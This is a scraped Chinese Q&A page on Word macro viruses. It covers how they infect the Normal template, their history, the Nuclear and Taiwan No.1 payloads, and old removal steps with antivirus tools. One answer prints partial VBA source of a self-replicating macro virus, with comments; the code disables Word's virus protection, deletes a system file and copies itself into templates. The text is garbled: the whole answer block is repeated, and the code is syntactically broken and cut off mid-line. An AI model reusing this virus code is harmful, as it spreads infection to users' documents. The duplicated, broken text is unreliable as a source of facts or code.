宏病毒是什么意思?
1个回答
展开全部
问题一:中了宏病毒是什么症状? 宏病毒
是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
什么是宏病毒
宏病毒是一些别有用心的人,利用Microsoft Office的开放性,即Word中提供的VBA编程接口,专门制作的一个或多个具有病毒特点的宏的 *** 。其特点是传播极快、制作变种方便、破坏性极大。
大多数宏病毒中含有自动宏或对文档读写操作的宏指令,以BFF(Binary File Format)的加密压缩格式存放在.doc或.dot文件中,每种Word版本格式可能不兼容。
目前发现的几种主要宏病毒有:Wazzu、Concept、13号病毒、Nuclear、July.killer(又名“七月杀手”)。
宏病毒是通过DOC文档及DOT模板进行自我复制及传播。DOC文件被宏病毒感染后,它的属性必然会被改为模板,而不是文档 (尽管形式上其扩展名仍是DOC)。一旦打开这样的文件,宏病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒。
查杀宏病毒
因为每个版本的Word BFF格式不完全一样,所以宏病毒在不同版本的Word中被压缩的格式和存放的位置都不同,所以,用杀毒软件杀除宏病毒,关键是杀毒后要能正确、安全地恢复文件参数。
笔者目前使用的是KV300杀毒软件,它的解毒方法有两种。
方法1:在Windows环境下执行kvw3000.exe,任选一可能存在宏病毒的子目录进行查杀。KV300在查出病毒后,为了安全起见,先将其扩展名改为.kv,然后再将原文件中的病毒杀除。
方法2:在DOS环境下,用干净的Windows 98系统软盘引导机器,运行KV300,出现主菜单后,按下可能存在宏病毒的盘符键,就会对宏病毒自动清除,精确地恢复了文件的参数,文件可正常地打开。
当你遇到来历不明的word文档提示有宏存在时,先用杀毒软件查杀一下,不可贸然打开,千万千万,切记切记
一、宏病毒的原理
病毒WORD/EXCEL宏病毒的特性较为相似,因此我们仅以WORD宏病毒为例,说明宏病毒的作用、传染以及发作的机理和特性。
宏病毒的产生,是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘,病毒可以把特定的宏命令代码附加在指定文件上,通过文件的打开或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取某种控制权,达到传染的目的。目前在可被宏病毒感染的系统中,以微软的Word、Excel居多。
二、宏病毒的作用机制
以Word为例,一旦病毒宏侵入WORD,它就会替代原有的正常宏,如FileOpen、FileSave、FileSaveAs和 FilePrint等等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。当某项功能被调用时,相应的病 毒宏就会纂夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等等。宏病毒在感染一个文档时,首先要把文档转换成模板格式,然后把所有病毒宏(包括自动宏)复制到该文档中。被转换成模板格式后的染毒文件无法转存为任何其它格式。含有自动宏的宏病......>>
问题二:宏病毒的起源 宏病毒起源 当病毒的先驱者们醉心于他们高超的汇编语言技术和成果时,可能不会想到后继者能以更加简单的手法制造影响力更大的病毒。Word宏病毒就是其中最具有代表性的范例之一。其实宏病毒的出现并非出乎人们的意料,早在80年代后期就有专家预言过。那时,有些学生就用某些应用程序的宏语言编写病毒。然而,宏病毒与普通病毒不同,它不感染.EXE或.文件,而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风,对人们正常使用计算机进行学习和工作带来了不可估量的影响,同时也造成了社会财富的巨大浪费。1996年12月13日,一种被称为“TaiwanNo.1”的病毒同时在北京和深圳被发现,一例来自于Internet的下载文件,另一例来自某医院的一项合作协议书。在一个专门研究医学病毒的捍卫人体健康的机构发现被计算机病毒侵袭的事件,可真是有些戏剧性的效果。凡是经历过小球病毒发作的人都能体味这样一种恐慌的感觉,恐慌的根源就是您对病毒本身尚一无所知时,感觉命运似乎刹那间就即将被别人掌握了。Internet电子邮件已日益成为病毒的携带者。当您在Internet上用Email收看邮件时,是否想到,您可能会受到计算机病毒的威胁。一般一个纯粹的电子邮件内容没有病毒,但其附加的文件极可能带有病毒。附加文件的病毒扩散首先需要运行它。举个例子来说:您收到了一个附加有用Word编辑的文件,这个Word文件被病毒感染了,当您运行该附加文件时,计算机就会受到病毒的威胁。所谓宏,就是一些命令组织在一起,作为一个单独命令完成一个特定任务。MicrosoftWord中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。Word使用宏语言Word_Basic将宏作为一系列指令来编写。要想搞清楚宏病毒的来龙去脉,必须了解Word宏的知识及wordBasic编程技术。Wo_rd宏病毒是一些制作病毒的专业人员利用MicrosoftWord的开放性即word中提供的WordBASIC编程接口,专门制作的一个或多个具有病毒特点的宏的 *** ,这种病毒宏的 *** 影响到计算机使用,并能通过.DOC文档及.DOT模板进行自我复制及传播。
问题三:什么是360宏病毒扫描 对办公族和学生电脑用户来说,最头疼的莫过于Office文档感染宏病毒,轻则辛苦编辑的文档全部报废,重则私密文档被病毒窃取。龚此,360杀毒最新升级3.1正式版,推出Office宏病毒扫描“专杀”,可全面查杀寄生在Excel、Word等文档中的Office宏病毒,查杀能力处于行业领先地位。
问题四:宏病毒的分析 宏病毒传播途径主要有:1,软盘交流染毒文档文件;2,硬盘染毒,处理的文档文件必将染毒;3,光盘携带宏病毒;4,Internet上下载染毒文档文件;5,BBS交流染毒文档文件;6,电子邮件的附件夹带病毒。两支宏病毒分析1,Nuclear宏病毒这是一个对操作系统文件和打印输出有破坏功能的宏病毒。这个宏病毒中包含以下病毒宏:AutoExecAutoOpenDropSurivFileExitFilePrintFilePrintDefaultFileSaveAsInsertPayloadPayload这些宏是只执行(Execute-only)宏。Nuclear宏病毒造成的破坏现象为:(1)打开一个染毒文档并打印的时候,它会在您打印的最后一段加上“STOPALLFRENCHNUCLEARTESTINGINTHEPACIFIC!”,这个现象是在每分钟的55秒~60秒之间操作打印时发生。(2)如果在每天17:00~18:00之间打开一个染毒文档,Nuclear病毒会将PH33R病毒传染到计算机上,这是个驻留型病毒。(3)在每年的4月5日,该病毒会将计算机上IO.SYS和MSDOS.SYS文件清零,并且删除C盘根目录上的MAND. 文件。一旦病毒发作,MSDOS就不可能被引导,计算机将陷入瘫痪。2,台湾一号病毒台湾一号病毒会在每月的13日影响您正常使用Word文档和编辑器。它包含以下病毒宏:AutoCloseAutoNewAutoOpen这些宏是可被编辑宏。在病毒宏中含有如下的语句:IfDay(Now())=13Then...这条语句与13日有关。台湾一号病毒造成的危害是:在每月13日,若用户使用Word打开一个带毒的文档(模板)时,病毒会被激发。激发时的现象是:在屏幕正中央弹出一个对话框,该对话框提示用户做一个心算题,如做错,它将会无限制地打开文件,直至Word内存不够,Word出错为止;如心算题做对,会提示用户“什么是巨集病毒(宏病毒)?”,回答“我就是巨集病毒”,再提示用户:“如何预防巨集病毒?”,回答是“不要看我”。
问题五:360查杀宏病毒 宏病毒和病毒 木马有啥区别 360查杀宏病毒是专业查杀宏病毒的,宏病毒是一种寄存在文档或模板的宏中的计算机病毒。和木马不一样。
问题六:宏病毒和蠕虫病毒的区别是什么 宏病毒仅仅是在office里面起作用~而蠕虫病毒就比较广泛了~像大家熟悉的“熊猫烧香”就是蠕虫
问题七:求高手指教宏病毒 代码的详细分析,每一句都是什么意思。 Private Sub Document_Close() ‘close事件,当文档关闭时触发
On Error Resume Next ’如果出错了就执行下一句
s = ActiveDocument.Saved ,将当前活动文档保存,并把保存结果给s变量
Application.EnableCancelKey = Not -1 ‘使程序运行无法中断
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNorma丁Prompt = 0: End With 将好几句写到了以行,设置options的一些属性。太麻烦了,如果你有一句两句不明白我告诉你。
Randomize
If Dir(c:\ethan.___, 6) = Then
Open c:\ethan.___ For Output As #1
For i = 1 To MacroContainer.VBProject.VBponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next I
Close #1
SetAttr c:\ethan.___, 6
End If
If Dir(c:\class.sys) Then Kill c:\class.sys
If NormalTemplate.VBProject.VBponents.Item( 1 ) .CodeModule.Lines ( 1, 1 ) Private Sub
Document_Close() Then
Set t = NormalTemplate.VBProject.VBponents.Item(1)
Else If ActiveDocument.VBProject.VBponents.Item( 1 ) .CodeModule.Lines ( 1, 1 ) Private SubDocument_Close() Then
Set t = ActiveDocument.VBProject.VBponents.Item(1)
Else
t =
End If
If t Then
Open c:\ethan.___ For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
If Rnd >
是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。
什么是宏病毒
宏病毒是一些别有用心的人,利用Microsoft Office的开放性,即Word中提供的VBA编程接口,专门制作的一个或多个具有病毒特点的宏的 *** 。其特点是传播极快、制作变种方便、破坏性极大。
大多数宏病毒中含有自动宏或对文档读写操作的宏指令,以BFF(Binary File Format)的加密压缩格式存放在.doc或.dot文件中,每种Word版本格式可能不兼容。
目前发现的几种主要宏病毒有:Wazzu、Concept、13号病毒、Nuclear、July.killer(又名“七月杀手”)。
宏病毒是通过DOC文档及DOT模板进行自我复制及传播。DOC文件被宏病毒感染后,它的属性必然会被改为模板,而不是文档 (尽管形式上其扩展名仍是DOC)。一旦打开这样的文件,宏病毒就会被激活,转移到计算机上,并驻留在 Normal 模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒。
查杀宏病毒
因为每个版本的Word BFF格式不完全一样,所以宏病毒在不同版本的Word中被压缩的格式和存放的位置都不同,所以,用杀毒软件杀除宏病毒,关键是杀毒后要能正确、安全地恢复文件参数。
笔者目前使用的是KV300杀毒软件,它的解毒方法有两种。
方法1:在Windows环境下执行kvw3000.exe,任选一可能存在宏病毒的子目录进行查杀。KV300在查出病毒后,为了安全起见,先将其扩展名改为.kv,然后再将原文件中的病毒杀除。
方法2:在DOS环境下,用干净的Windows 98系统软盘引导机器,运行KV300,出现主菜单后,按下可能存在宏病毒的盘符键,就会对宏病毒自动清除,精确地恢复了文件的参数,文件可正常地打开。
当你遇到来历不明的word文档提示有宏存在时,先用杀毒软件查杀一下,不可贸然打开,千万千万,切记切记
一、宏病毒的原理
病毒WORD/EXCEL宏病毒的特性较为相似,因此我们仅以WORD宏病毒为例,说明宏病毒的作用、传染以及发作的机理和特性。
宏病毒的产生,是利用了一些数据处理系统内置宏命令编程语言的特性而形成的。这些数据处理系统内置宏编程语言的存在使得宏病毒有机可乘,病毒可以把特定的宏命令代码附加在指定文件上,通过文件的打开或关闭来获取控制权,实现宏命令在不同文件之间的共享和传递,从而在未经使用者许可的情况下获取某种控制权,达到传染的目的。目前在可被宏病毒感染的系统中,以微软的Word、Excel居多。
二、宏病毒的作用机制
以Word为例,一旦病毒宏侵入WORD,它就会替代原有的正常宏,如FileOpen、FileSave、FileSaveAs和 FilePrint等等,并通过这些宏所关联的文件操作功能获取对文件交换的控制。当某项功能被调用时,相应的病 毒宏就会纂夺控制权,实施病毒所定义的非法操作,包括传染操作、表现操作以及破坏操作等等。宏病毒在感染一个文档时,首先要把文档转换成模板格式,然后把所有病毒宏(包括自动宏)复制到该文档中。被转换成模板格式后的染毒文件无法转存为任何其它格式。含有自动宏的宏病......>>
问题二:宏病毒的起源 宏病毒起源 当病毒的先驱者们醉心于他们高超的汇编语言技术和成果时,可能不会想到后继者能以更加简单的手法制造影响力更大的病毒。Word宏病毒就是其中最具有代表性的范例之一。其实宏病毒的出现并非出乎人们的意料,早在80年代后期就有专家预言过。那时,有些学生就用某些应用程序的宏语言编写病毒。然而,宏病毒与普通病毒不同,它不感染.EXE或.文件,而只感染文档文件。宏病毒就像自然界中令人恐惧的龙卷风,对人们正常使用计算机进行学习和工作带来了不可估量的影响,同时也造成了社会财富的巨大浪费。1996年12月13日,一种被称为“TaiwanNo.1”的病毒同时在北京和深圳被发现,一例来自于Internet的下载文件,另一例来自某医院的一项合作协议书。在一个专门研究医学病毒的捍卫人体健康的机构发现被计算机病毒侵袭的事件,可真是有些戏剧性的效果。凡是经历过小球病毒发作的人都能体味这样一种恐慌的感觉,恐慌的根源就是您对病毒本身尚一无所知时,感觉命运似乎刹那间就即将被别人掌握了。Internet电子邮件已日益成为病毒的携带者。当您在Internet上用Email收看邮件时,是否想到,您可能会受到计算机病毒的威胁。一般一个纯粹的电子邮件内容没有病毒,但其附加的文件极可能带有病毒。附加文件的病毒扩散首先需要运行它。举个例子来说:您收到了一个附加有用Word编辑的文件,这个Word文件被病毒感染了,当您运行该附加文件时,计算机就会受到病毒的威胁。所谓宏,就是一些命令组织在一起,作为一个单独命令完成一个特定任务。MicrosoftWord中对宏定义为:“宏就是能组织到一起作为一独立的命令使用的一系列word命令,它能使日常工作变得更容易”。Word使用宏语言Word_Basic将宏作为一系列指令来编写。要想搞清楚宏病毒的来龙去脉,必须了解Word宏的知识及wordBasic编程技术。Wo_rd宏病毒是一些制作病毒的专业人员利用MicrosoftWord的开放性即word中提供的WordBASIC编程接口,专门制作的一个或多个具有病毒特点的宏的 *** ,这种病毒宏的 *** 影响到计算机使用,并能通过.DOC文档及.DOT模板进行自我复制及传播。
问题三:什么是360宏病毒扫描 对办公族和学生电脑用户来说,最头疼的莫过于Office文档感染宏病毒,轻则辛苦编辑的文档全部报废,重则私密文档被病毒窃取。龚此,360杀毒最新升级3.1正式版,推出Office宏病毒扫描“专杀”,可全面查杀寄生在Excel、Word等文档中的Office宏病毒,查杀能力处于行业领先地位。
问题四:宏病毒的分析 宏病毒传播途径主要有:1,软盘交流染毒文档文件;2,硬盘染毒,处理的文档文件必将染毒;3,光盘携带宏病毒;4,Internet上下载染毒文档文件;5,BBS交流染毒文档文件;6,电子邮件的附件夹带病毒。两支宏病毒分析1,Nuclear宏病毒这是一个对操作系统文件和打印输出有破坏功能的宏病毒。这个宏病毒中包含以下病毒宏:AutoExecAutoOpenDropSurivFileExitFilePrintFilePrintDefaultFileSaveAsInsertPayloadPayload这些宏是只执行(Execute-only)宏。Nuclear宏病毒造成的破坏现象为:(1)打开一个染毒文档并打印的时候,它会在您打印的最后一段加上“STOPALLFRENCHNUCLEARTESTINGINTHEPACIFIC!”,这个现象是在每分钟的55秒~60秒之间操作打印时发生。(2)如果在每天17:00~18:00之间打开一个染毒文档,Nuclear病毒会将PH33R病毒传染到计算机上,这是个驻留型病毒。(3)在每年的4月5日,该病毒会将计算机上IO.SYS和MSDOS.SYS文件清零,并且删除C盘根目录上的MAND. 文件。一旦病毒发作,MSDOS就不可能被引导,计算机将陷入瘫痪。2,台湾一号病毒台湾一号病毒会在每月的13日影响您正常使用Word文档和编辑器。它包含以下病毒宏:AutoCloseAutoNewAutoOpen这些宏是可被编辑宏。在病毒宏中含有如下的语句:IfDay(Now())=13Then...这条语句与13日有关。台湾一号病毒造成的危害是:在每月13日,若用户使用Word打开一个带毒的文档(模板)时,病毒会被激发。激发时的现象是:在屏幕正中央弹出一个对话框,该对话框提示用户做一个心算题,如做错,它将会无限制地打开文件,直至Word内存不够,Word出错为止;如心算题做对,会提示用户“什么是巨集病毒(宏病毒)?”,回答“我就是巨集病毒”,再提示用户:“如何预防巨集病毒?”,回答是“不要看我”。
问题五:360查杀宏病毒 宏病毒和病毒 木马有啥区别 360查杀宏病毒是专业查杀宏病毒的,宏病毒是一种寄存在文档或模板的宏中的计算机病毒。和木马不一样。
问题六:宏病毒和蠕虫病毒的区别是什么 宏病毒仅仅是在office里面起作用~而蠕虫病毒就比较广泛了~像大家熟悉的“熊猫烧香”就是蠕虫
问题七:求高手指教宏病毒 代码的详细分析,每一句都是什么意思。 Private Sub Document_Close() ‘close事件,当文档关闭时触发
On Error Resume Next ’如果出错了就执行下一句
s = ActiveDocument.Saved ,将当前活动文档保存,并把保存结果给s变量
Application.EnableCancelKey = Not -1 ‘使程序运行无法中断
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNorma丁Prompt = 0: End With 将好几句写到了以行,设置options的一些属性。太麻烦了,如果你有一句两句不明白我告诉你。
Randomize
If Dir(c:\ethan.___, 6) = Then
Open c:\ethan.___ For Output As #1
For i = 1 To MacroContainer.VBProject.VBponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next I
Close #1
SetAttr c:\ethan.___, 6
End If
If Dir(c:\class.sys) Then Kill c:\class.sys
If NormalTemplate.VBProject.VBponents.Item( 1 ) .CodeModule.Lines ( 1, 1 ) Private Sub
Document_Close() Then
Set t = NormalTemplate.VBProject.VBponents.Item(1)
Else If ActiveDocument.VBProject.VBponents.Item( 1 ) .CodeModule.Lines ( 1, 1 ) Private SubDocument_Close() Then
Set t = ActiveDocument.VBProject.VBponents.Item(1)
Else
t =
End If
If t Then
Open c:\ethan.___ For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
If Rnd >
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
